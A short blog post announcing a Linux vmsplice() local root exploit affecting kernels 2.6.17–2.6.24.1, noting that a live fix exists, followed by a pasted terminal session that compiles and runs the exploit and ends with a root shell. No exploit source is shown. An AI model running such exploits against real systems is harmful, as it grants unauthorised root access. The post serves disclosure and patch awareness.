There's a new Linux local root exploit,
working in kernels 2.6.17 – 2.6.24.1. It's a long time since such a big
hole was found in so many kernel versions at once. The exploit was confirmed
to work in Ubuntu, Debian, Fedora and possibly many more. So it looks like
we'll need a run of quick updates, goddamnit! The hole was found in vmsplice()
function, which by the way can be easily disabled at kernel compilation
stage.
Fortunately there already exists a quick fix working on a live system (it doesn't require to reinstall the kernel).
The exploit in action:
wanted@fafik: /crack/local-root-exp$ gcc exp.c -static -Wno-format wanted@fafik: /crack/local-root-exp$ ./a.out ———————————– Linux vmsplice Local Root Exploit By qaaz ———————————– [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7ede000 .. 0xb7f10000 [+] root root@fafik: /crack/local-root-exp# id uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),106(lpadmin),107(admin),1000(wanted)
